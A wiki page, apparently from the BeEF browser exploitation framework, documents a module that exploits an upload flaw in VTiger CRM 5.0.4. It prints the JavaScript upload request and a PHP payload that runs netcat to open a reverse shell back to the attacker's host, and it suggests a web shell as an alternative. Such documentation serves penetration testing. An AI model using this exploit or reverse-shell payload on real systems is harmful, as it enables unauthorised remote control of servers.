-
Notifications
You must be signed in to change notification settings - Fork 2.1k
Module: VTiger CRM Upload Exploit
Haoxi Tan edited this page Jan 8, 2020
·
2 revisions
-
Objective: Exploits VTiger CRM 5.0.4 and uploads a reverse shell
-
Authors: wade, bm, pipes, xntrik, yorikv
-
Browsers: All
Uploads a reverse shell PHP file via XMLHttpRequest.
var targeturl = baseurl + '/index.php?module=uploads&action=add2db&return_module=Home&return_action=index';
//..
http_request.open("POST", targeturl, true);
http_request.setRequestHeader("Content-type", "multipart/form-data; boundary=---------------------------PWNED");
http_request.setRequestHeader("Content-length", requestbody.length);
http_request.send(requestbody);
//...The PHP uploaded and executed:
<?php passthru("/bin/nc -e /bin/sh '+beef_host+' 8888"); ?>If /bin/nc is not installed on the target machine, this will not work. For a start you can try to upload a web shell instead of a reverse shell. The PHP code can be changed in
<beef_path>/modules/exploits/vtiger_crm_upload_exploit/module.rb
- Configuration
- Interface
- Information Gathering
- Social Engineering
- Network Discovery
- Metasploit
- Tunneling
- XSS Rays
- Persistence
- Creating a Module
- Geolocation
- Using-BeEF-With-NGROK